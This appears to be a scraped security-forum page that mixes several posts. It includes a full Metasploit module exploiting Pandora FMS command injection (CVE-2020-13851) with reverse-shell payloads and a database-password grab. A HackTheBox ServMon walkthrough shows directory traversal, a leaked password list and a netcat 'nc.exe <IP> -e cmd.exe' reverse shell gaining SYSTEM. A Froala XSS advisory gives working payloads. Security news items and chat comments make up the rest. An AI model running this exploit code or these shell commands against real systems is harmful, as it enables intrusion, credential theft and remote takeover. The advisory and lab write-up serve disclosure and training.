Kev

This Metasploit module exploits a vulnerability (CVE-2020-13851) in Pandora FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps older versions) in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in th e Events feature of Pandora FMS. This flaw allows users to execute arbitrary commands via the target parameter in HTTP POST requests to the Events function. After authenticating to the target, the module attempts to exploit this flaw by issuing such an HTTP POST request, with the target parameter set to contain the payload. If a shell is obtained, the module will try to obtain the local MySQL database password via a simple grep command on the plaintext /var/www/html/pandora_console/include/config.php file. Valid credentials for a Pandora FMS account are required. The account does not need to have admin privileges. This module has been successfully tested on Pandora 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version). ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Pandora FMS Events Remote Command Execution', 'Description' => %q{ This module exploits a vulnerability (CVE-2020-13851) in Pandora FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps older versions) in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in the `Events` feature of Pandora FMS. This flaw allows users to execute arbitrary commands via the `target` parameter in HTTP POST requests to the `Events` function. After authenticating to the target, the module attempts to exploit this flaw by issuing such an HTTP POST request, with the `target` parameter set to contain the payload. If a shell is obtained, the module will try to obtain the local MySQL database password via a simple `grep` command on the plaintext `/var/www/html/pandora_console/include/config.php` file. Valid credentials for a Pandora FMS account are required. The account does not need to have admin privileges. This module has been successfully tested on Pandora 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version). }, 'License' => MSF_LICENSE, 'Author' => [ 'Fernando Catoira', # Discovery 'Julio Sanchez', # Discovery 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-13851'], # RCE via the `events` feature ['URL', 'https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities'] ], 'Platform' => ['linux', 'unix'], 'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD], 'Targets' => [ [ 'Linux (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' } } ], [ 'Linux (x64)', { 'Arch' => ARCH_X64, 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ], [ 'Linux (cmd)', { 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ] ], 'Privileged' => false, 'DisclosureDate' => '2020-06-04', 'DefaultTarget' => 1 ) ) register_options [ OptString.new('TARGETURI', [true, 'Base path to Pandora FMS', '/pandora_console/']), OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pandora']) ] end def check vprint_status('Running check') res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.php') unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('<title>Pandora FMS - the Flexible Monitoring System</title>') return CheckCode::Safe('Target is not a Pandora FMS application.') end @cookie = res.get_cookies html = res.get_html_document full_version = html.at('div[@id="ver_num"]') if full_version.blank? return CheckCode::Detected('Could not determine the Pandora FMS version.') end full_version = full_version.text version = full_version[1..-1].sub('NG', '') if version.blank? return CheckCode::Detected('Could not determine the Pandora FMS version.') end version = Gem::Version.new version unless version <= Gem::Version.new('7.0.744') return CheckCode::Safe("Target is Pandora FMS version #{full_version}.") end CheckCode::Appears("Target is Pandora FMS version #{full_version}.") end def login(user, pass) vprint_status "Authenticating as #{user} ..." res = send_request_cgi!({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'cookie' => @cookie, 'vars_get' => { 'login' => '1' }, 'vars_post' => { 'nick' => user, 'pass' => pass, 'login_button' => 'Login' } }) unless res.code == 200 && res.body.include?('<b>Pandora FMS Overview</b>') fail_with Failure::NoAccess, 'Authentication failed' end print_good "Authenticated as user #{user}." end def on_new_session(client) super if target.arch.first == ARCH_CMD print_status('Trying to read the MySQL DB password from include/config.php. The default privileged user is `root`.') client.shell_write("grep dbpass include/config.php\n") else print_status('Tip: You can try to obtain the MySQL DB password via the shell command `grep dbpass include/config.php`. The default privileged user is `root`.') end end def execute_command(cmd, _opts = {}) print_status('Executing payload...') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'ajax.php'), 'cookie' => @cookie, 'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8', 'Referer' => full_uri('index.php'), 'vars_get' => { 'sec' => 'eventos', 'sec2' => 'operation/events/events' }, 'vars_post' => { 'page' => 'include/ajax/events', 'perform_event_response' => '10000000', 'target' => cmd.to_s, 'response_id' => '1' } }, 0) # the server will not send a response, so the module shouldn't wait for one end def exploit login(datastore['USERNAME'], datastore['PASSWORD']) if target.arch.first == ARCH_CMD execute_command payload.encoded else execute_cmdstager(background: true) end end end # 0day.today [2020-07-12] # Source

DarkOs DarkOs An Arch Based Distro | Status: Beta | Brought to you by: ybenel Dark OS Is A Linux Operating System Based On Arch Linux, Designed To Create More Enjoyable User Experience And Easy To Use . It Comes With 3 Editions (One Hell - Soopertrack - Schmedding), Each Edition Has It's Own Desktop / Window Manager And Package List. DarkOs "One Hell" Edition Comes With Plasma Desktop Environment And Minimal Amount Of Packages . DarkOs "Soopertrack" Edition Comes With No Desktop Or Window Manager But Uses LXDE As Temporarily Environment To Provide You With The Installer And It'll Be Removed Once The Installation Is Finished,It Also Comes With No Essential Packages Such As (Browser , Text Editor , Terminal ...etc) So You'll Get To Choose What You Want. DarkOs "Schmedding" Comes With No Desktop Or Window Manager Nor An Installer And Has No Packages So You Could Enjoy The Experience As If You Were Installing Arch Linux . Features Minimal And Easy Gives You Full Control Customize What You Want Enjoy Using Linux Similar To Arch Linux (80%) Choose What's Perfect For You Screenshot: Download Source: https://sourceforge.net/projects/darkos-arch/

Earlier this week, Citrix released security updates for Citrix Application Delivery Controller (ADC), Citrix Gateway, and the Citrix SD-WAN WANOP appliance, and urged admins to apply them as soon as possible to reduce risk. At the time, there was no public attack code and no indication that any of the fixed flaws were getting actively exploited. On Thursday, though, SANS ISC’s Dr. Johannes Ullrich spotted attackers attempting to exploit two of the Citrix vulnerabilities on his F5 BigIP honeypot (set up to flag CVE-2020-5902 exploitation attempts). About the vulnerabilities The fixed flaws are 11 in total, ranging from information disclosure and DoS bugs to elevation of pivelege, XSS and code injection flaws. He also pointed out that of the 11 vulnerabilities, there are six possible attacks routes, and five of those have barriers to exploitation. Finally, he added that the vulnerabilities have no link to CVE-2019-19781, the remote code execution flaw that’s been heavily exploited by attackers since late December/early January. About the recent exploitation attempts Dr. Ullrich said that they are seeing some scans that are looking for systems that haven’t been patched yet. One of the exploited vulnerabilities allows arbitrary file downloads, the other allows retrieval of a PCI-DSS report without authentication. Via helpnetsecurity.com

nu am citit articolul complet, dar presimt in loc de bere mici, mustar, vor avea internet gratuit, cat despre vulnerabilitati, vor vota toti nepotii

ServMon retired today. ServMon is a easy-rated windows machine on HackTheBox platform. It’s IP is 10.10.10.184. Feel free to check out my hackthebox profile yky4u. Respect me if I helped you. Let’s begin! Enumeration Let’s do a nmap scan on 10.10.10.184, -sC for default script, -sV for version detection, -p- for full ports. [root@H0ST: ~/HTB/servmon]$ nmap -sC -sV -p- 10.10.10.184 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 12:15 BST Nmap scan report for 10.10.10.184 Host is up (0.086s latency). Not shown: 65517 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_01-18-20 12:05PM <DIR> Users | ftp-syst: |_ SYST: Windows_NT 22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0) | ssh-hostkey: | 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA) | 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA) |_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519) 80/tcp open http | fingerprint-strings: | GetRequest, HTTPOptions, RTSPRequest: | HTTP/1.1 200 OK | Content-type: text/html | Content-Length: 340 | Connection: close | AuthInfo: | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | <html xmlns="http://www.w3.org/1999/xhtml"> | <head> | <title></title> | <script type="text/javascript"> | window.location.href = "Pages/login.htm"; | </script> | </head> | <body> | </body> | </html> | NULL: | HTTP/1.1 408 Request Timeout | Content-type: text/html | Content-Length: 0 | Connection: close |_ AuthInfo: |_http-title: Site doesn't have a title (text/html). 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5040/tcp open unknown 5666/tcp open tcpwrapped 6063/tcp open tcpwrapped 6699/tcp open napster? 8443/tcp open ssl/https-alt | fingerprint-strings: | FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: | HTTP/1.1 404 | Content-Length: 18 | Document not found | GetRequest: | HTTP/1.1 302 | Content-Length: 0 | Location: /index.html | workers |_ jobs | http-title: NSClient++ |_Requested resource was /index.html | ssl-cert: Subject: commonName=localhost | Not valid before: 2020-01-14T13:24:20 |_Not valid after: 2021-01-13T13:24:20 |_ssl-date: TLS randomness does not represent time 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.80%I=7%D=6/19%Time=5EEC9EC4%P=x86_64-pc-linux-gnu%r(NULL SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\. SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\ SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20 SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2 SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n") SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\ SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\ SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1 SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\ SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20 SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\ SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1- SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2 SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\ SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=6/19%Time=5EEC9ECC%P=x86_64-pc-linux-gn SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 SF:\0\0\0\0\0\0\x12\x02\x18\0\x1aE\n\x07workers\x12\x0b\n\x04jobs\x12\x03\ SF:x18\xc0\x04\x12")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length: SF:\x2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1 SF:\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r SF:(RTSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocum SF:ent\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Leng SF:th:\x2018\r\n\r\nDocument\x20not\x20found"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 3m20s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-06-19T11:23:21 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 315.00 seconds FTP allows anonymous login on port 21. We discovered two users and two interesting files. Let’s download it and see what it is. Nadine — Confidential.txt [root@H0ST: ~/HTB/servmon]$ cat Confidential.txt Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nathan — Notes to do.txt [root@H0ST: ~/HTB/servmon]$ cat 'Notes to do.txt' 1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint There is a web application NVMS-1000 on port 80, which has a directory traversal vulnerability. Exploit can be found on exploit-db. NVMS-1000-Directory-Traversal Let’s have a look at the exploit # Title: NVMS-1000 - Directory Traversal # Date: 2019-12-12 # Author: Numan Türle # Vendor Homepage: http://en.tvt.net.cn/ # Version : N/A # Software Link : http://en.tvt.net.cn/products/188.html POC --------- GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: 12.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close Response --------- ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 Let’s try to retrieve files on Nathan’s Desktop using directory traversal vulnerability. We found seven passwords in a file named Password.txt. Here are the passwords. 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$ We need to find out the correct credentials. We can do it by using crackmapexec or hydra. Valid credentials is Nadine:L1k3B1gBut7s@W0rk. We are able to use that credentials to login to SSH. Privilege Escalation NSClient++ web application is running on port 8443. Run the command to obtain the password. Let’s route the traffic from 10.10.10.184:8443 to 127.0.0.1:8443 using SSH. ssh -L 8443:127.0.0.1:8443 Nadine@10.10.10.184 We browsed to http://127.0.0.1:8443 and we can see the web application prompt to ask for password, enter ew2x6SsGTxjRwXOT to login to the application. We can use the NSClient++ 0.5.2.35 — Privilege Escalation exploit. Take a look at what it is: Exploit Author: bzyo Twitter: @bzyo_ Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation Date: 05-05-19 Vulnerable Software: NSClient++ 0.5.2.35 Vendor Homepage: http://nsclient.org/ Version: 0.5.2.35 Software Link: http://nsclient.org/download/ Tested on: Windows 10 x64 Details: When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator's password in cleartext from the configuration file. From here a user is able to login to the web server and make changes to the configuration file that is normally restricted. The user is able to enable the modules to check external scripts and schedule those scripts to run. There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere. Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation. A reboot, as far as I can tell, is required to reload and read the changes to the web config. Prerequisites: To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system. Exploit: 1. Grab web administrator password - open c:\program files\nsclient++\nsclient.ini or - run the following that is instructed when you select forget password C:\Program Files\NSClient++>nscp web -- password --display Current password: SoSecret 2. Login and enable following modules including enable at startup and save configuration - CheckExternalScripts - Scheduler 3. Download nc.exe and evil.bat to c:\temp from attacking machine @echo off c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe 4. Setup listener on attacking machine nc -nlvvp 443 5. Add script foobar to call evil.bat and save settings - Settings > External Scripts > Scripts - Add New - foobar command = c:\temp\evil.bat 6. Add schedulede to call script every 1 minute and save settings - Settings > Scheduler > Schedules - Add new - foobar interval = 1m command = foobar 7. Restart the computer and wait for the reverse shell on attacking machine nc -nlvvp 443 listening on [any] 443 ... connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671 Microsoft Windows [Version 10.0.17134.753] (c) 2018 Microsoft Corporation. All rights reserved. C:\Program Files\NSClient++>whoami whoami nt authority\system Risk: The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System Check the version of NSClient++ by running nscp test. We can confirm it is vulnerable. Let’s create evil.bat and put it in C:\Temp directory. [root@H0ST: ~/HTB/servmon]$ cat evil.bat @echo off c:\temp\nc.exe 10.10.14.23 4444 -e cmd.exe Download evil.bat and nc.exe to the box using PowerShell. Go to scripts, put c:\temp\evil.bat into the Value field to create a script to run evil.bat. Go to Scheduler, and set the Value to interval = 1m Listen on port 4444. Click Control, and click Reload button. We have a reverse shell as nt authority\system now. Source

PatternAnalyzer The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use. This project was created for the "Security of wireless and mobile network communications" class of 2019. ICSD Department of University of Aegean. Download Source

############################################################# # # Product: Froala WYSIWYG HTML Editor # Vendor: Froala # CSNC ID: CSNC-2020-004 # CVE ID: CVE-2019-19935 # Subject: DOM XSS in Froala WYSIWYG HTML Editor # Severity: Medium # Effect: Remotely exploitable # Author: Emanuel Duss <emanuel.duss@compass-security.com> # Date: 2020-07-01 # ############################################################# Introduction ------------ Froala WYSIWYG HTML Editor is a lightweight WYSIWYG HTML Editor written in JavaScript that enables rich text editing capabilities for web applications [1]. Froala sanitizes the user input in order to prevent cross-site scripting attacks [2]. During a web application penetration test, Compass found a DOM-based cross-site scripting (XSS) [3] in the Froala WYSIWYG HTML Editor. HTML code in the editor is not correctly sanitized when inserted into the DOM. This allows an attacker that can control the editor content to execute arbitrary JavaScript in the context of the victim's session. Affected -------- * All versions of the Froala WYSIWYG HTML Editor The issue was found in December 2019 in version 3.0.6 and was still not fixed in July 2020 in version 3.1.1. Technical Summary ----------------- It's possible to perform DOM based XSS in the Froala editor by inserting the `<iframe>` tag and the `srcdoc` attribute into the editor: <iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe> This can be verified by inserting the payload into the "Code View" of the editor. In this case, this is would be a self-XSS because the users would only attack themselves. However, it could be possible that untrusted data from a non-controlled source is loaded into the editor in order to exploit it. An example could be a web application where multiple users can edit the same content using this editor. An attacker can use this to execute own JavaScript code in the session of the victim. This can be abused to read the content of the victim's account, use the session to make further requests to the web application or read the cookies or web storage. Technical Details ----------------- # Correct Behavior According to the Froala tech support page "Why is the <script> tag being removed?", the `<script>` tag is removed in order to prevent possible XSS attacks [2]. Other XSS payloads that use other HTML tags and event handlers are also removed from the DOM before they are inserted. This can be verified using a PoC hosted on `poc.example.net` that inserts potentially untrusted data with a `<script>` tag into the editor: <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/css/froala_style.min.css" rel="stylesheet" type="text/css" /> <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/css/froala_editor.pkgd.min.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/js/froala_editor.pkgd.min.js"></script> <div id="froala-editor"></div> <script> let editor = new FroalaEditor('div#froala-editor', {}, function() { // This data could be loaded from a potentially untrusted source, e.g. from an API via an XMLHttpRequest data = "<s>Hello<\/s><script>console.log(document.domain)<\/script><u>Compass<\/u>"; // Inserting untrusted data into the editor editor.html.set(data); // Show how the untrusted data is embedded into the DOM console.log(editor.html.get()); }) </script> The JavaScript console shows that legit HTML tags like `<s>` or `<u>` were inserted into the DOM but the `<script>` tag was correctly removed (as expected) and therefore the JavaScript was not executed: <p><s>Hello</s><u>Compass</u></p> The same can be done by inserting an `<img>` tag with an `onerror` event handler as an XSS vector: [...] data = "<s>Hello<\/s><img src=x onerror=console.log(document.domain)><u>Compass<\/u>"; [...] The JavaScript console again shows that the legit HTML tags were inserted and also the `<img>` tag, but without the used `onerror` event handler. Therefore, the JavaScript was not executed: <p><s>Hello</s><img src="x" class="fr-fic fr-dii"><u>Compass</u></p> This shows that it's not possible to load and execute common XSS payloads into the editor. # XSS Bypass I tried every event handler from the awesome PortSwigger XSS cheat sheet [4], but all of them were blocked. Thanks to the XSS cheat sheet, I found an HTML tag with an attribute that does not start with `on`, which can execute JavaScript in the origin of the website. This tag was not filtered. It's the `<iframe>` tag with the `srcdoc` attribute. The `srcdoc` attribute specifies the HTML content of the page to show in the inline frame [5]. This can be used to embed JavaScript code. The code runs in the origin of the website where the iframe is embedded. Working XSS payload: [...] data = "<s>Hello<\/s><iframe srcdoc=\"<img src=x onerror=console.log(document.domain)>\"><\/iframe><u>Compass<\/u>"; [...] The JavaScript console shows that the `<iframe>` tag with the `srcdoc` attribute was inserted into the DOM without sanitizing. Also the content of the iframe with the `<img>` tag and the `onerror` event handler was not sanitized. Further, the origin on which PoC website is hosted is printed: <p><s>Hello</s><iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe><u>Compass</u></p> poc.example.net Therefore, this shows that the following XSS payload can be used in order to inject and execute JavaScript into the DOM, which results in a DOM-based XSS: <iframe srcdoc="<img src=x onerror=console.log(document.domain)>"></iframe> Note: The `<img>` tag with the `onerror` event handler is only the data content of the `srcdoc` attribute and no code for the browser. This is rendered into code later when the content of the iframe is built. The injected JavaScript code runs in the origin of the website where the Froala editor is running. The next section explains why I mention this explicitly. XSS with Undefined / Empty Origin --------------------------------- There are several issues marked as open and fixed in the Froala GitHub repository regarding XSS [6]. The closed ones are also not fixed at the moment. However, most of these XSS are running in another origin as the website where the editor is loaded. # Example 1 For example, the issue #3270 [7] that is marked as closed and uses an embedded object (`<embed>` tag) in order to execute JavaScript: [...] data = "<EMBED/SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+Y29uc29sZS5sb2coZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pjwvc3ZnPgo=\">" [....] The base64 decoded payload is an SVG image containing JavaScript: <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss"> <script type="text/ecmascript">console.log(document.domain)</script></svg> The JavaScript console shows that the code is executed but the origin is `undefined`: <p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+Y29uc29sZS5sb2coZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pjwvc3ZnPgo="></p> undefined # Example 2 Another example is the issue #3039 [8] that is marked as closed uses the `<object>` tag to embed HTML / JavaScript code: [...] data = "<object data='data:text/html,<svg onload=console.log(document.domain)>'>"; [...] The JavaScript console shows that the code is executed but the origin is empty: <p><object data="data:text/html,<svg onload=console.log(document.domain)>"></object></p> // empty line # Exploiting XSS with Undefined / Empty Origins Because the origin is not the same as where the PoC is hosted, it's not a typical XSS where an attacker could read the content of the victim's website, use the session to make further requests or access the cookies or web storage. It is however still possible to perform arbitrary redirects to other websites using the reference to the `window.top.location`: [...] data = "<object data='data:text/html,<svg onload=window.top.location=\"http://evil.example.net/\">'>"; [...] This redirects to http://evil.example.net/. The same applies for the embed tag: [...] data = "<EMBED/SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj4KICA8c2NyaXB0PndpbmRvdy50b3AubG9jYXRpb249Imh0dHA6Ly9ldmlsLmV4YW1wbGUubmV0LyI8L3NjcmlwdD4KPC9zdmc+Cg==\">" [...] Decoded base64 payload: <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss"> <script>window.top.location="http://evil.example.net/"</script> </svg> This also redirects to http://evil.example.net/. This is not as nice and powerful as the "real" XSS attack from the beginning, but still something ;-). Vulnerability Classification ---------------------------- CVSS v3.1 Metrics [9]: * CVSS Base Score: 6.1 * CVSS Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Remediation ----------- This XSS issue is not fixed. The vendor can't tell any exact release date for a fixed version. Therefore, only trusted data or data that is already sanitized should be loaded into the editor. # 0day.today [2020-07-05] # Source

Tot Bunicu' tot pe irc, era op pe mai multe #

M-am intalnit recent(anul curent) cu el si mi-a spus ca nu stie daca ne mai vedem, era depresiv(doliu) in caz de vorbim despre aceeasi persoana

Security researchers detected a new ransomware strain that leveraged piracy as a means of distributing itself to Mac users. On June 29, a Twitter user reached out to Malwarebytes about a malicious Little Snitch installer that was available for download on a Russian forum known for sharing torrent links. A close look at the installer revealed that it used a generic icon and arrived within a disk image file. Upon activation, this resource loaded the legitimate installer and uninstaller apps for Little Snitch, a program which alerts users when an app attempts to connect to a web server. The program also installed an executable called “patch” in the /Users/Shared directory. After a script moved it to a location that appeared to relate to Little Snitch and renamed it “CrashReporter” for the purpose of blending in, “patch” removed itself from the /Users/Shared directory, launched its copy and then launched the Little Snitch installer. This process didn’t go so well, however. As Malwarebytes explained in its research: Further investigation revealed that the threat relied on a malicious installer for DJ software called “Mixed In Key 8.” The malware delivered by that installer was similarly hesitant to get to work, but after Malwarebytes changed the clock setting of its virtual machine, disconnected from the network and restarted the computer a few times, the ransomware finally sprung into action and launched its encryption routine. This process led the threat to encrypt settings files and the keychain files, thus producing error messages and spinning beach balls. Researchers at the security firm learned from others that the Mac ransomware eventually deployed a ransom note with instructions for payment. Even so, it was unable to replicate this behavior. Screenshot of encryption message posted to RUTracker forum (Source: Malwarebytes) This isn’t the first time that researchers have detected ransomware targeting Mac users. Back in 2017, for instance, researchers spotted another crypto-malware strain that relied on cracks to pirate commercial software for distribution. As such, organizations should follow these steps to prevent a ransomware infection from occurring in the first place. Via tripwire.com

